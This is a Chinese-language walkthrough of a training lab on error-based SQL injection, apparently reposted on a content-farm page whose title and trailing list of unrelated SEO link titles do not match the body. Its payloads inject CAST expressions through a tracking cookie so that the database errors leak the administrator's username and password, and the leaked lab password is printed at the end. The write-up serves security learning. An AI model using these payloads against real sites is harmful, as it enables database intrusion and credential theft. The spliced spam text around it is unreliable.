当前位置: 首页 > wzjs >正文

个人网站建设实验心得手游推广个人合作平台

个人网站建设实验心得,手游推广个人合作平台,柳州学校网站建设,开发手机网站用什么语言文章目录 前言:进入实验室构造 payload 前言: 实验室标题为: 基于可见错误的 SQL 注入 等级:执业者 简介: 本实验室包含 SQL 注入漏洞。应用程序使用跟踪 cookie 进行分析,并执行包含已提交 cookie 值…

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

基于可见错误的 SQL 注入

等级:执业者

简介:

本实验室包含 SQL 注入漏洞。应用程序使用跟踪 cookie 进行分析,并执行包含已提交 cookie 值的 SQL 查询。SQL 查询结果不会返回。

数据库包含一个名为users的不同表,其中有名为username和password的列。要解决这个实验问题,请想办法泄露管理员用户的密码,然后登录他们的账户。

进入实验室

依旧是一个商店页面

构造 payload

借助谷歌插件 EditThisCookie

输入单引号,页面显示报错

注意报错内容中显示了完整的 SQL 查询,包括 cookie 值;除此之外,还解释了有一个未闭合的字符串;需要额外注意的是注入内容出现在单引号字符串中。

输入单引号+注释符

9Dr386uz23LFIvjF' --

刷新页面,页面返回正常,表明在语法上是有效的

select 查询

9Dr386uz23LFIvjF' and cast((seect 1) as int) --

页面显示报错,报错显示存在语法错误

修改 payload

9Dr386uz23LFIvjF' and 1=cast((select 1) as int) --

页面返回正常,说明语法正确

查询用户名

9Dr386uz23LFIvjF' and 1=cast((select username from users) as int) --

页面显示报错,但是由于字符限制,报错显示并不完整

修改 payload,删除 cookie 值

' and 1=cast((select username from users) as int) --

页面依旧显示报错,报错内容显示返回多于一条记录

如果限制返回一行,是否就不会出现报错

' and 1=cast((select username from users limit 1) as int) --

报错中出现了 administrator

继续尝试能否报错出现密码

' and 1=cast((select password from users limit 1) as int) --

成功在爆破中得到密码

登录账号密码,成功通关

administrator

vai842k57z3l4lb0hgij

http://www.dtcms.com/wzjs/7594.html

相关文章:

  • php java开发网站开发seo关键词排名软件流量词
  • 常州市政府建设局网站百度地图排名怎么优化
  • 呼和浩特公司网站制作更厉害的病毒2024
  • 免费的行情软件网站下载不用下载网站排名优化怎么做
  • 做视频的网站域名注册
  • 建设项目环保备案网站注册域名后如何建立网站
  • 营销型网站建设公司比较专业安庆seo
  • 网站建设的会计科目发帖子最好的几个网站
  • 通过ip访问网站需要怎么做百度广告投诉电话
  • 镇江平面设计关键词优化排名软件流量词
  • 想看外国的网站怎么做全国疫情最新情况最新消息今天
  • 易烊千玺个人网站企业网站推广方案的策划
  • 可以做网站鹤壁seo推广
  • 潍坊网站建设 APP开发小程序十大免费货源网站免费版本
  • 网站建设书籍推荐小说引流推广
  • 去年做那些网站能致富美食软文300范例
  • 网站的布局和配色北京网站优化方法
  • 对于网站运营应该如何做qq推广官网
  • 自助建站系统加盟域名大全查询
  • 公司注册新流程济南seo关键词排名工具
  • 重庆大足网站制作公司推荐怎么做电商生意
  • 青岛做网站建公司湖南好搜公司seo
  • 银川做网站的有哪些新东方烹饪学校学费价目表
  • 乌鲁木齐最新政策信息百度seo培训课程
  • 赤峰市做网站建设的公司靠谱seo整站优化外包
  • php网站开发文章管理系统网络营销网站有哪些
  • 万网ecs放多个网站软文一般发布在哪些平台
  • 无需注册免费的网站谷歌外贸
  • 外贸wap网站产品怎么做市场推广
  • 关于人大门户网站建设发稿服务